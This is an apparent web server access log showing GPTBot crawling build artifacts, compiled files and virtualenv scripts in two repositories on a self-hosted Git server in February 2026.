"/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:17:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15260] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11169] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:17:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15262] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11169] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:17:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11491] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fCMakeLists.txt" [Client 74.7.227.38] [Length 25135] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:01:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11014] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:17:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10526] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:17:01:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:17:01:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10097] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:17:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:17:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10013] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:17:01:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:17:01:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10014] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:17:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:17:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10526] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:17:01:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:01:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14256] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:17:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10091] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:17:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14250] [Gzip 8.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:17:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10090] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:17:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:17:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:17:01:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:17:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14033] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:17:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:17:01:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:17:01:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:17:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:17:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:17:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:17:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:01:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:01:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:17:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:17:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:01:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 74.7.227.38] [Length 13532] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:01:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:17:01:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 74.7.227.38] [Length 11011] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:17:01:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:17:01:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 74.7.227.38] [Length 11561] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:17:01:54 +0000] - 200 200 - 